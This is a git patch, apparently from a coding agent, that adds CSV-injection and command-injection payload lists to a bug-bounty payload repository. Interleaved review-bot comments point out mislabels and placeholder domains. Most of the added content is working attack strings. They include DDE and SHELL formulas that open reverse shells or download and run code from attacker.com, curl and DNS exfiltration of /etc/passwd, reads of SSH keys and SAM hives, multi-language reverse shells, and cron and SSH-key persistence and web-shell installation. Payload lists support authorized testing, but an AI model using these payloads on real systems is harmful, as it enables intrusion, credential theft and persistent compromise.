From 0a48c19312c2c60b02fd1d58ba70c42832b8a409 Mon Sep 17 00:00:00 2001
From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com>
Date: Sun, 4 Jan 2026 19:45:07 +0000
Subject: [PATCH] Add NoSQL, CSV, File Upload vulnerabilities and enhance
Command Injection
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
---
CSV-Injection/README.md | 42 ++
CSV-Injection/csv-injection-payloads.txt | 328 +++++++++
.../command-injection-payloads.txt | 538 ++++++++++++++-
File-Upload/README.md | 73 ++
File-Upload/file-upload-payloads.txt | 648 ++++++++++++++++++
NoSQL-Injection/README.md | 38 +
NoSQL-Injection/nosql-injection-payloads.txt | 323 +++++++++
README.md | 5 +-
8 files changed, 1971 insertions(+), 24 deletions(-)
create mode 100644 CSV-Injection/README.md
create mode 100644 CSV-Injection/csv-injection-payloads.txt
create mode 100644 File-Upload/README.md
create mode 100644 File-Upload/file-upload-payloads.txt
create mode 100644 NoSQL-Injection/README.md
create mode 100644 NoSQL-Injection/nosql-injection-payloads.txt
diff --git a/CSV-Injection/README.md b/CSV-Injection/README.md
new file mode 100644
index 0000000..215c543
--- /dev/null
+++ b/CSV-Injection/README.md
@@ -0,0 +1,42 @@
+# CSV Injection (Formula Injection)
+
+## Description
+CSV Injection (also known as Formula Injection) is a vulnerability that occurs when websites embed untrusted input inside CSV files. When a spreadsheet application (like Microsoft Excel, LibreOffice Calc, or Google Sheets) opens a CSV file containing malicious formulas, it may execute the formulas, leading to arbitrary command execution, information disclosure, or other attacks.
+
+## Common Attack Vectors
+- Export functionality (user data, reports, analytics)
+- Contact forms that export to CSV
+- User profile data exports
+- Order history exports
+- Any feature that generates downloadable CSV files
+- Import/Export features in CRM systems
+- Billing and invoice downloads
+- Survey results exports
+
+## Testing Approach
+Submit formula characters (=, +, -, @, \t, \r) followed by commands or formulas in:
+- Name fields
+- Address fields
+- Comment/description fields
+- Any user-controllable data that might be exported to CSV
+
+## Risk Impact
+- Remote code execution via DDE (Dynamic Data Exchange)
+- Information disclosure (reading local files)
+- SSRF (Server-Side Request Forgery)
+- Credential theft
+- Malware distribution
+
+## Common Vulnerable Patterns
+- Direct export of user input to CSV without sanitization
+- Missing CSV encoding/escaping
+- Lack of formula character stripping
+- Client-side only validation
+
+## Payloads
+See `csv-injection-payloads.txt` for a comprehensive list of CSV injection payloads covering:
+- Formula injection techniques
+- DDE (Dynamic Data Exchange) attacks
+- Command execution payloads
+- Data exfiltration methods
+- Multi-application compatibility
diff --git a/CSV-Injection/csv-injection-payloads.txt b/CSV-Injection/csv-injection-payloads.txt
new file mode 100644
index 0000000..25fd8a3
--- /dev/null
+++ b/CSV-Injection/csv-injection-payloads.txt
@@ -0,0 +1,328 @@
+# CSV Injection Payloads (Formula Injection) - 2020-2025
+
+# ============================
+# Basic Formula Injection
+# ============================
+
+# Equals Formula
+=1+1
+=1+2+3
+=SUM(1+1)
+=2+5+cmd|' /C calc'!A0
+="string"
+=CMD|' /C powershell IEX(wget attacker.com/shell.ps1)'!A0
+
+# Plus Formula
++1+1
++cmd|'/c calc'!A1
++DDE("cmd";"/c calc";"!")
+
+# Minus Formula
+-1+1
+-cmd|'/c calc'!A1
+-DDE("cmd";"/c calc";"!")
+
+# At Symbol Formula
+@sum(1+1)
+@SUM(A1:A10)
+
+# Tab Character
+ =1+1
+ +1+1
+ -1+1
+ @sum(1+1)
+
+# Carriage Return
+=1+1
++=1+1
+
+# ============================
+# DDE (Dynamic Data Exchange) Attacks
+# ============================
+
+# Basic DDE - Command Execution
+=DDE("cmd";"/c calc";"!")
+=DDE("cmd";"/c calc.exe";"!")
+=DDE("cmd";"/c powershell";"!")
+=DDE("cmd";"/c cmd";"!")
+
+# DDE - File Reading
+=DDE("cmd";"/c type C:\Windows\System32\drivers\etc\hosts";"!")
+=DDE("cmd";"/c type C:\Users\*\Desktop\passwords.txt";"!")
+=DDE("cmd";"/c dir C:\";"!")
+
+# DDE - Information Disclosure
+=DDE("cmd";"/c whoami";"!")
+=DDE("cmd";"/c hostname";"!")
+=DDE("cmd";"/c ipconfig";"!")
+=DDE("cmd";"/c net user";"!")
+=DDE("cmd";"/c systeminfo";"!")
+
+# DDE - Data Exfiltration
+=DDE("cmd";"/c curl http://attacker.com?data=$(whoami)";"!")
+=DDE("cmd";"/c powershell -c Invoke-WebRequest -Uri http://attacker.com -Method POST -Body (Get-Content C:\passwords.txt)";"!")
+=DDE("cmd";"/c certutil -urlcache -split -f http://attacker.com/shell.exe C:\temp\shell.exe";"!")
+
+# DDE - Reverse Shell
+=DDE("cmd";"/c powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"";"!")
+
+# ============================
+# Excel HYPERLINK Function
+# ============================
+
+=HYPERLINK("http://attacker.com","Click here")
+=HYPERLINK("http://attacker.com?cookie="&A1,"Click")
+=HYPERLINK("file:///C:/Windows/System32/calc.exe","Click to update")
+=HYPERLINK(CONCATENATE("http://attacker.com/",A1),"Link")
+
+# ============================
+# IMPORTXML / WEBSERVICE Functions
+# ============================
+
+=IMPORTXML("http://attacker.com/xxe.xml","//data")
+=IMPORTXML(CONCAT("http://attacker.com?data=",A1),"//data")
+=WEBSERVICE("http://attacker.com")
+=WEBSERVICE(CONCAT("http://attacker.com?leak=",A1))
+
+# ============================
+# Obfuscation Techniques
+# ============================
+
+# Using CHAR function to hide commands
+=CHAR(61)&"DDE(""cmd"";""/c calc"";""!"")"
+=CONCATENATE(CHAR(61),"1+1")
+=CHAR(61)&CHAR(68)&CHAR(68)&CHAR(69)&"(""cmd"";""/c calc"";""!"")"
+
+# Using string concatenation
+="="&"1+1"
+=CONCATENATE("=","1+1")
+="="&"DDE(""cmd"";""/c calc"";""!"")"
+
+# Double encoding
+==1+1
+=+1+1
+= =1+1
+
+# Null byte injection
+=1+1%00
+=DDE("cmd";"/c calc";"!")%00
+
+# Unicode characters
+=1+1
+﹢1+1
+⁼1+1
+
+# Whitespace obfuscation
+= 1+1
+= 1+1
+= 1+1
+
+# ============================
+# Cross-Application Payloads
+# ============================
+
+# LibreOffice Calc
+=SHELL("calc")
+=SHELL("gnome-calculator")
+=SHELL("xterm -e bash")
+=SHELL("wget http://attacker.com/shell.sh -O /tmp/shell.sh && bash /tmp/shell.sh")
+
+# Google Sheets
+=IMAGE("http://attacker.com/track.png")
+=IMAGE("https://attacker.com/"&A1)
+=IMPORTDATA("http://attacker.com/data.csv")
+=IMPORTFEED("http://attacker.com/feed")
+=IMPORTHTML("http://attacker.com","table",1)
+=IMPORTRANGE("spreadsheet-id","Sheet1!A1:B10")
+
+# ============================
+# Advanced Techniques (2023-2025)
+# ============================
+
+# Chained formulas
+=IF(A1="admin",DDE("cmd";"/c calc";"!"),"safe")
+=IF(ISNUMBER(SEARCH("admin",A1)),WEBSERVICE("http://attacker.com"),"")
+
+# Nested functions
+=SUM(DDE("cmd";"/c calc";"!"))
+=CONCATENATE(DDE("cmd";"/c whoami";"!"))
+
+# Conditional execution
+=IF(1=1,DDE("cmd";"/c calc";"!"),1)
+=IFERROR(DDE("cmd";"/c calc";"!"),1)
+
+# ============================
+# Context-Aware Payloads
+# ============================
+
+# Name field
+=DDE("cmd";"/c calc";"!")
++DDE("cmd";"/c calc";"!")
+-DDE("cmd";"/c calc";"!")
+@DDE("cmd";"/c calc";"!")
+
+# Email field
+test@test.com=DDE("cmd";"/c calc";"!")
+=WEBSERVICE("http://attacker.com")@test.com
+
+# Comment field
+Great product! =DDE("cmd";"/c calc";"!")
+Review: +cmd|'/c calc'!A1
+
+# ============================
+# Payload Variations for WAF Bypass
+# ============================
+
+# Mixed case
+=dDe("cmd";"/c calc";"!")
+=DdE("cmd";"/c calc";"!")
+
+# Alternative quotes
+=DDE('cmd';'/c calc';'!')
+=DDE(`cmd`;`/c calc`;`!`)
+
+# Line breaks
+=DDE("cmd";
+"/c calc";
+"!")
+
+# Tabs and spaces
+=DDE( "cmd" ; "/c calc" ; "!" )
+
+# ============================
+# Platform-Specific Payloads
+# ============================
+
+# Windows
+=cmd|'/c calc'!A1
+=cmd|'/c powershell -c "Start-Process calc"'!A1
+=cmd|'/c mshta http://attacker.com/payload.hta'!A1
+=cmd|'/c certutil -urlcache -split -f http://attacker.com/bad.exe bad.exe && bad.exe'!A1
+=cmd|'/c wmic process call create "calc.exe"'!A1
+=cmd|'/c reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall'!A1
+
+# Linux/Unix
+=SHELL("calc")
+=SHELL("xcalc")
+=SHELL("xterm")
+=SHELL("/bin/bash -i >& /dev/tcp/attacker.com/4444 0>&1")
+=SHELL("curl http://attacker.com/shell.sh | bash")
+=SHELL("nc attacker.com 4444 -e /bin/sh")
+
+# macOS
+=SHELL("open /Applications/Calculator.app")
+=SHELL("osascript -e 'tell application \"Calculator\" to activate'")
+=SHELL("curl http://attacker.com/payload.sh | sh")
+
+# ============================
+# Data Exfiltration Payloads
+# ============================
+
+# Exfiltrate cell data
+=WEBSERVICE("http://attacker.com?data="&A1)
+=HYPERLINK("http://attacker.com?token="&B2,"Update")
+=IMAGE("http://attacker.com/track.gif?user="&C3)
+
+# Exfiltrate multiple cells
+=WEBSERVICE("http://attacker.com?u="&A1&"&p="&B1)
+=CONCATENATE("http://attacker.com/",A1,"/",B1,"/",C1)
+
+# ============================
+# Denial of Service
+# ============================
+
+# Resource exhaustion
+=SUM(1:1048576)
+=IF(A1<>"",$A$1:$XFD$1048576,"")
+=VLOOKUP(A1,$A$1:$XFD$1048576,1,FALSE)
+
+# Circular references
+=A1
+(in cell A1 itself, causes circular reference)
+
+# ============================
+# Remote File Inclusion
+# ============================
+
+=IMPORTXML("http://attacker.com/xxe.xml","//data")
+=IMPORTHTML("http://attacker.com/malicious.html","table",1)
+=IMPORTFEED("http://attacker.com/rss")
+=IMPORTDATA("http://attacker.com/data.txt")
+
+# ============================
+# XXE via CSV (when parsed as XML internally)
+# ============================
+
+=IMPORTXML("data:text/xml,]>&xxe;","//foo")
+
+# ============================
+# Social Engineering Payloads
+# ============================
+
+Please verify your account: =HYPERLINK("http://phishing.com","Click Here")
+Congratulations! You won: =DDE("cmd";"/c calc";"!")
+URGENT - Security Update Required =cmd|'/c powershell iex(wget attacker.com/malware.ps1)'!A1
+Invoice #12345 =WEBSERVICE("http://attacker.com/log")
+
+# ============================
+# Polyglot Payloads
+# ============================
+
+=1+1';alert(document.domain)//
+=DDE("cmd";"/c calc";"!")||'
++cmd|'/c calc'!A1'">
+
+# ============================
+# Null Cell Reference
+# ============================
+
+=A0
+=DDE("cmd";"/c calc";"!")!A0
+=cmd|'/c powershell'!A0
+
+# ============================
+# Format Confusion
+# ============================
+
+"=1+1"
+'=1+1
+`=1+1
+´=1+1
+
+# ============================
+# Batch CSV Injection (Multiple Rows)
+# ============================
+
+# First row normal, second row malicious
+Normal User,user@email.com,Regular Comment
+Hacker,=DDE("cmd";"/c calc";"!"),Malicious
+
+# ============================
+# CSV Injection in Different Contexts
+# ============================
+
+# In URL parameters
+?name==DDE("cmd";"/c calc";"!")
+?search=+cmd|'/c calc'!A1
+
+# In JSON (if converted to CSV)
+{"name": "=DDE(\"cmd\";\"/c calc\";\"!\")"}
+
+# In XML (if converted to CSV)
+=cmd|'/c calc'!A1
+
+# ============================
+# Time-Delayed Payloads
+# ============================
+
+=IF(NOW()>DATE(2024,1,1),DDE("cmd";"/c calc";"!"),1)
+=IF(TODAY()=WEEKDAY(1),WEBSERVICE("http://attacker.com"),1)
+
+# ============================
+# Modern Framework Specific (2024-2025)
+# ============================
+
+# When exported from web applications
+=WEBSERVICE(CONCAT("http://attacker.com/?cookie=",CELL("filename")))
+=HYPERLINK("javascript:alert(document.cookie)","click")
+=@SUM(A1:A1000)*WEBSERVICE("http://attacker.com")
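Review bot: The line `(in cell A1 itself, causes circular reference)` under the `# Circular references` heading is bare prose in a file whose every other non-`#` line is an entry, so a line-oriented consumer of this list will feed it as a payload; prefix it with `#` like the other explanatory lines. The entries under `# Tab Character`, `# Carriage Return` and `# Unicode characters` are, as rendered in this hunk, indistinguishable from the plain `=1+1` forms, which suggests the control characters did not survive (or will not survive a copy-paste); a comment stating that the raw bytes are present, or writing them as `\t` / `\r` escapes with a note saying so, would keep the file unambiguous. `attacker.com` and `phishing.com` are real registrable domains, so anyone running this list verbatim against a target sends that target's data to an unrelated third party; use a reserved name such as `attacker.example` (RFC 2606) or the `ATTACKER_IP`-style placeholders the command-injection file already uses.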
diff --git a/Command-Injection/command-injection-payloads.txt b/Command-Injection/command-injection-payloads.txt
index f7e58d1..74d787c 100644
--- a/Command-Injection/command-injection-payloads.txt
+++ b/Command-Injection/command-injection-payloads.txt
@@ -1,6 +1,10 @@
-# Command Injection Payloads
+# Command Injection Payloads (2020-2025 Enhanced Bug Bounty Edition)
-# Basic command injection
+# ============================
+# BASIC COMMAND INJECTION
+# ============================
+
+# Command Separators
; ls
| ls
|| ls
@@ -8,73 +12,561 @@
&& ls
`ls`
$(ls)
+%0a ls
+\n ls
-# Chained commands
+# Chained Commands
; whoami
| whoami
|| whoami
& whoami
&& whoami
-# Command substitution
+# Command Substitution
`whoami`
$(whoami)
;`whoami`
;$(whoami)
+$((whoami))
-# File operations
+# ============================
+# LINUX/UNIX COMMANDS
+# ============================
+
+# File Operations
; cat /etc/passwd
| cat /etc/passwd
; cat /etc/shadow
| cat /etc/shadow
-; ls -la
+; ls -la /
| ls -la /
+; head -n 50 /etc/passwd
+; tail -n 50 /var/log/auth.log
-# Windows commands
+# System Information
+; uname -a
+; hostname
+; id
+; whoami
+; pwd
+; env
+; set
+; printenv
+; cat /proc/version
+; cat /etc/issue
+; cat /etc/*-release
+; ifconfig
+; ip addr
+; route -n
+; netstat -tulpn
+; ps aux
+; w
+; last
+
+# File Discovery
+; find / -name "*.conf" 2>/dev/null
+; find / -name "config*" 2>/dev/null
+; find / -name "*password*" 2>/dev/null
+; find / -perm -4000 2>/dev/null
+; locate password
+; locate admin
+; which gcc
+; which python
+; which perl
+
+# Reading Sensitive Files
+; cat ~/.bash_history
+; cat ~/.ssh/id_rsa
+; cat ~/.ssh/authorized_keys
+; cat /var/www/html/config.php
+; cat /var/www/html/wp-config.php
+; cat /etc/apache2/apache2.conf
+; cat /etc/nginx/nginx.conf
+; cat /root/.ssh/id_rsa
+
+# ============================
+# WINDOWS COMMANDS
+# ============================
+
+# Basic Commands
& dir
| dir
+& dir C:\
& type C:\Windows\win.ini
| type C:\boot.ini
& whoami
| net user
+& hostname
+& ipconfig
+& systeminfo
-# Time-based detection
+# Windows System Info
+& systeminfo
+& wmic qfe list
+& wmic logicaldisk get caption
+& net user
+& net localgroup administrators
+& net user /domain
+& net group /domain
+& net group "Domain Admins" /domain
+& tasklist
+& netstat -ano
+& ipconfig /all
+& route print
+& arp -a
+
+# Windows File Operations
+& type C:\Users\Administrator\Desktop\passwords.txt
+& dir C:\Users\
+& dir C:\inetpub\wwwroot\
+& type C:\Windows\System32\drivers\etc\hosts
+& reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
+& reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
+
+# PowerShell Commands
+& powershell Get-Process
+& powershell Get-Service
+& powershell Get-NetIPConfiguration
+& powershell Get-ComputerInfo
+& powershell Get-LocalUser
+& powershell Get-LocalGroup
+& powershell Get-ChildItem C:\ -Recurse -Include *.txt,*.doc,*.pdf -ErrorAction SilentlyContinue
+& powershell -c "Get-Content C:\Users\Administrator\Desktop\passwords.txt"
+
+# Windows Credential Dumping
+& reg save HKLM\SAM C:\temp\sam.hive
+& reg save HKLM\SYSTEM C:\temp\system.hive
+& reg save HKLM\SECURITY C:\temp\security.hive
+
+# ============================
+# TIME-BASED BLIND INJECTION
+# ============================
+
+# Linux
; sleep 5
| sleep 5
-& ping -n 5 127.0.0.1
-| ping -c 5 127.0.0.1
-; timeout 5
-& timeout /t 5
+|| sleep 5
+& sleep 5
+&& sleep 5
+; sleep 10
+`sleep 5`
+$(sleep 5)
-# Output redirection
+# Using ping for delay
+; ping -c 5 127.0.0.1
+| ping -c 10 127.0.0.1
+|| ping -c 5 localhost
+
+# Windows
+& timeout 5
+| timeout 5
+& timeout /t 5
+& ping -n 5 127.0.0.1
+| ping -n 10 127.0.0.1
+& ping 127.0.0.1 -n 5 > nul
+
+# ============================
+# OUTPUT REDIRECTION & EXFILTRATION
+# ============================
+
+# Output to File
; ls > /tmp/output.txt
| ls > /tmp/output.txt
& dir > C:\temp\output.txt
+; whoami > /var/www/html/whoami.txt
+; cat /etc/passwd > /tmp/passwd.txt
-# URL encoded
-%3B%20ls
-%7C%20ls
+# Append to File
+; ls >> /tmp/output.txt
+; whoami >> /var/www/html/info.txt
+
+# Error Redirection
+; ls 2>&1
+; cat /etc/shadow 2>/dev/null
+; find / -name "*.conf" 2>/dev/null
+
+# Data Exfiltration via HTTP
+; curl http://attacker.com?data=$(whoami)
+; wget http://attacker.com/exfil?data=$(cat /etc/passwd | base64)
+; curl -d "data=$(cat /etc/passwd)" http://attacker.com/collect
+& powershell -c "Invoke-WebRequest -Uri http://attacker.com?data=$(whoami) -Method GET"
+
+# DNS Exfiltration
+; nslookup $(whoami).attacker.com
+; dig $(whoami).attacker.com
+; host $(whoami).attacker.com
+
+# ============================
+# ENCODING & OBFUSCATION
+# ============================
+
+# URL Encoding
+%3B%20whoami
+%7C%20whoami
%26%20whoami
+%0a%20whoami
+%0d%0a%20whoami
+
+# Double URL Encoding
+%253B%2520whoami
+%257C%2520whoami
+
+# Unicode Encoding
+\u003b whoami
+
+# Hex Encoding
+\x3b whoami
+\x0a whoami
+
+# Octal Encoding
+\073 whoami
+
+# ============================
+# NEWLINE INJECTION
+# ============================
-# Newline injection
%0a whoami
%0d%0a whoami
\n whoami
\r\n whoami
+\r whoami
+%0awhoami
+%0d%0awhoami
-# Spaces bypass
+# ============================
+# SPACE BYPASS TECHNIQUES
+# ============================
+
+# No Space
;cat& /dev/tcp/YOUR_IP/PORT 0>&1
-& powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',PORT);"
+# Wildcards
+/???/??t /???/??ss??
+/bin/c?t /etc/p?sswd
+/bin/ca* /etc/pass*
+/b*n/c*t /e*c/p*wd
+
+# Variable Substitution
+$PATH
+$HOME
+$PWD
+${PATH:0:1}
+echo ${LS_COLORS:0:1}
+
+# Concatenation
+ca''t /etc/passwd
+c""at /etc/passwd
+c\a\t /etc/passwd
+
+# Case Manipulation (Bash)
+$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
+
+# ============================
+# COMMAND SUBSTITUTION VARIATIONS
+# ============================
+
+`whoami`
+$(whoami)
+$((whoami))
+`echo $(whoami)`
+$(echo `whoami`)
+a=$(whoami);echo $a
+a=`whoami`;echo $a
+
+# ============================
+# REVERSE SHELLS (FOR AUTHORIZED TESTING)
+# ============================
+
+# Bash Reverse Shell
+; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
+| bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
+; bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'
+; 0<&196;exec 196<>/dev/tcp/ATTACKER_IP/PORT; sh <&196 >&196 2>&196
+
+# NC Reverse Shell
+; nc -e /bin/sh ATTACKER_IP PORT
+; nc ATTACKER_IP PORT -e /bin/bash
+; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP PORT >/tmp/f
+
+# Python Reverse Shell
+; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
+; python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
+
+# Perl Reverse Shell
+; perl -e 'use Socket;$i="ATTACKER_IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
+
+# PHP Reverse Shell
+; php -r '$sock=fsockopen("ATTACKER_IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
+
+# Ruby Reverse Shell
+; ruby -rsocket -e'f=TCPSocket.open("ATTACKER_IP",PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
+
+# Telnet Reverse Shell
+; telnet ATTACKER_IP PORT | /bin/bash | telnet ATTACKER_IP SECOND_PORT
+
+# Windows PowerShell Reverse Shell
+& powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
+
+# Windows CMD Reverse Shell
+& powershell IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')
+
+# ============================
+# REMOTE CODE EXECUTION (RCE)
+# ============================
+
+# Download and Execute
+; curl http://attacker.com/shell.sh | bash
+; wget http://attacker.com/shell.sh -O- | bash
+; curl http://attacker.com/exploit.py | python
+& certutil -urlcache -split -f http://attacker.com/shell.exe C:\temp\shell.exe
+& powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"
+
+# Execute In-Memory
+; echo "curl http://attacker.com/payload" | bash
+& powershell -enc BASE64_ENCODED_COMMAND
+
+# ============================
+# SYMBOLIC LINK ATTACKS
+# ============================
+
+# Create Symlink to Sensitive Files
+; ln -s /etc/passwd /var/www/html/passwd.txt
+; ln -s /etc/shadow /tmp/shadow.txt
+; ln -s /root/.ssh/id_rsa /var/www/html/key.txt
+; ln -s /var/www/html/config.php /tmp/config.txt
+
+# Symlink to Directory
+; ln -s /etc/ /var/www/html/etc
+; ln -s /root/ /tmp/root
+; ln -s / /var/www/html/rootfs
+
+# Symlink Overwrite
+; ln -sf /etc/passwd /var/www/html/index.php
+; ln -sf /dev/null /var/log/access.log
+
+# Race Condition with Symlink
+; ln -s /etc/passwd target && cat target
+; ln -s /etc/shadow /tmp/link && cat /tmp/link
+
+# Symlink Arbitrary File Read
+; ln -s /etc/passwd public_html/passwd
+; ln -s ~/.ssh/id_rsa web/key
+
+# Symlink in Archive Extraction (Zip Slip)
+; ln -s /etc/passwd malicious_link
+; tar -czf payload.tar.gz malicious_link
+
+# ============================
+# BLIND COMMAND INJECTION DETECTION
+# ============================
+
+# Time-Based Detection
+|| sleep 5
+& sleep 5 &
+; ping -c 5 127.0.0.1
+| timeout 5
+
+# Out-of-Band (OOB) Detection
+; curl http://burpcollaborator.net
+; wget http://attacker.com/ping
+; nslookup attacker.com
+; ping attacker.com -c 1
+& nslookup attacker.com
+
+# DNS-Based Detection
+; nslookup $(whoami).attacker.com
+; dig $(whoami).attacker.com
+; host $(hostname).attacker.com
+
+# HTTP-Based Detection
+; curl http://attacker.com/?id=injection
+; wget http://attacker.com/?test=injection
+
+# ============================
+# POLYGLOT COMMAND INJECTION
+# ============================
+
+test;whoami
+test|whoami
+test||whoami
+test&whoami
+test&&whoami
+test`whoami`
+test$(whoami)
+test%0awhoami
+test\nwhoami
+
+# ============================
+# ADVANCED FILTER BYPASSES (2023-2025)
+# ============================
+
+# Whitespace Alternatives
+cat/etc/passwd
+{cat,/etc/passwd}
+X=$'cat\x20/etc/passwd'&&$X
+
+# Null Byte
+cat /etc/passwd%00
+whoami%00
+
+# Comment Injection
+cat /etc/passwd#comment
+whoami#comment
+cat /etc/passwd//comment
+
+# Using $PATH
+${PATH:0:1}bin${PATH:0:1}cat ${PATH:0:1}etc${PATH:0:1}passwd
+
+# Using $HOME
+$HOME/../../etc/passwd
+
+# Glob Characters
+/???/c?t /???/p?ssw?
+
+# ============================
+# WAF/IDS BYPASS
+# ============================
+
+# Case Variations
+Cat /etc/passwd
+CAT /etc/passwd
+cAt /etc/passwd
+
+# Using Tabs
+cat%09/etc/passwd
+
+# Using Line Feed
+cat%0a/etc/passwd
+
+# Combining Techniques
+c''a''t${IFS}/e''t''c/p''a''s''s''w''d
+
+# ============================
+# CONTEXT-SPECIFIC INJECTIONS
+# ============================
+
+# In Email Field
+user@domain.com; whoami
+user@domain.com| whoami
+user@domain.com`whoami`
+
+# In Filename
+file.txt; whoami
+file.txt| cat /etc/passwd
+$(whoami).txt
+
+# In URL
+http://example.com/page?id=1; whoami
+http://example.com/page?id=1| cat /etc/passwd
+
+# ============================
+# CRON JOB INJECTION
+# ============================
+
+# Persistent Access
+; (crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'") | crontab -
+; echo "* * * * * curl http://attacker.com/shell.sh | bash" | crontab -
+
+# ============================
+# SSH KEY INJECTION
+# ============================
+
+# Add SSH Key for Persistence
+; echo "ssh-rsa ATTACKER_PUBLIC_KEY" >> ~/.ssh/authorized_keys
+; mkdir -p ~/.ssh && echo "ssh-rsa ATTACKER_PUBLIC_KEY" >> ~/.ssh/authorized_keys && chmod 600 ~/.ssh/authorized_keys
+
+# ============================
+# BACKDOOR INSTALLATION
+# ============================
+
+# Web Shell Upload
+; curl http://attacker.com/shell.php -o /var/www/html/shell.php
+; wget http://attacker.com/backdoor.php -O /var/www/html/bd.php
+
+# Binary Download and Execute
+; curl http://attacker.com/backdoor -o /tmp/bd && chmod +x /tmp/bd && /tmp/bd
+; wget http://attacker.com/malware -O /tmp/malware && chmod +x /tmp/malware && /tmp/malware &
+
+# ============================
+# PRIVILEGE ESCALATION CHECKS
+# ============================
+
+# SUID Binaries
+; find / -perm -4000 -type f 2>/dev/null
+; find / -perm -u=s -type f 2>/dev/null
+
+# Sudo Permissions
+; sudo -l
+; cat /etc/sudoers
+
+# Writable Files
+; find / -writable -type f 2>/dev/null
+; find / -perm -222 -type f 2>/dev/null
+
+# ============================
+# LOG POISONING
+# ============================
+
+# Apache/Nginx Log Poisoning
+; echo "" >> /var/log/apache2/access.log
+; echo "" >> /var/log/nginx/access.log
+
+# ============================
+# ENVIRONMENT VARIABLE MANIPULATION
+# ============================
+
+; export PATH=/tmp:$PATH
+; echo $PATH
+; printenv
+
+# ============================
+# MODERN TECHNIQUES (2024-2025)
+# ============================
+
+# Abusing Built-in Features
+; source <(curl -s http://attacker.com/script.sh)
+; eval "$(curl -s http://attacker.com/cmd.txt)"
+
+# JavaScript Command Injection (Node.js)
+; node -e "require('child_process').exec('whoami')"
+
+# Using Alternative Shells
+; sh -c whoami
+; bash -c whoami
+; zsh -c whoami
+; ksh -c whoami
+
+# Exploiting Interpreters
+; python -c "import os;os.system('whoami')"
+; perl -e 'system("whoami")'
+; ruby -e 'system("whoami")'
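Review bot: The entry `;cat& /dev/tcp/YOUR_IP/PORT 0>&1` left under the new `# No Space` heading is malformed (it is a fragment of the old reverse-shell line, not a space-bypass example) and uses a placeholder style (`YOUR_IP`) the rest of the hunk has moved away from, so drop it rather than keep a line that demonstrates nothing. The `# Symlink in Archive Extraction (Zip Slip)` heading mislabels its two entries: Zip Slip is path traversal through `../` in archive entry names, whereas these lines create a symlink and archive it, which is the distinct symlink-following extraction issue, so a defender reading this would look for the wrong check; rename it to something like `# Symlink in Archive Extraction (symlink-following extractors)`. The `# Time-Based Detection` block near the end duplicates the earlier `TIME-BASED BLIND INJECTION` section, and its `& sleep 5 &` entry backgrounds the sleep so it yields no measurable delay; fold that block into the earlier section. Placeholders are mixed throughout (`attacker.com`, `ATTACKER_IP`, `burpcollaborator.net`), and `attacker.com` is a real registrable domain that receives real traffic from anyone who runs the list as-is; pick one reserved placeholder (RFC 2606 `.example`, or the `ATTACKER_IP` form) and use it consistently.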
diff --git a/File-Upload/README.md b/File-Upload/README.md
new file mode 100644
index 0000000..9c11d3d
--- /dev/null
+++ b/File-Upload/README.md
@@ -0,0 +1,73 @@
+# File Upload Vulnerabilities
+
+## Description
+File upload vulnerabilities occur when a web application allows users to upload files without properly validating the file type, content, or destination. Attackers can exploit these vulnerabilities to upload malicious files, leading to remote code execution (RCE), arbitrary file read/write, cross-site scripting (XSS), and other attacks.
+
+## Common Attack Vectors
+- Profile picture upload
+- Document upload features
+- Resume/CV upload
+- Image galleries
+- File sharing functionality
+- Import/export features
+- Backup/restore functionality
+- Plugin/theme upload (CMS)
+- Attachment features
+
+## Testing Approach
+Test various file upload bypasses:
+- Extension bypasses (double extensions, case variations, null bytes)
+- Content-Type manipulation
+- Magic byte manipulation
+- Polyglot files (valid image + valid code)
+- Archive file manipulation (zip, tar)
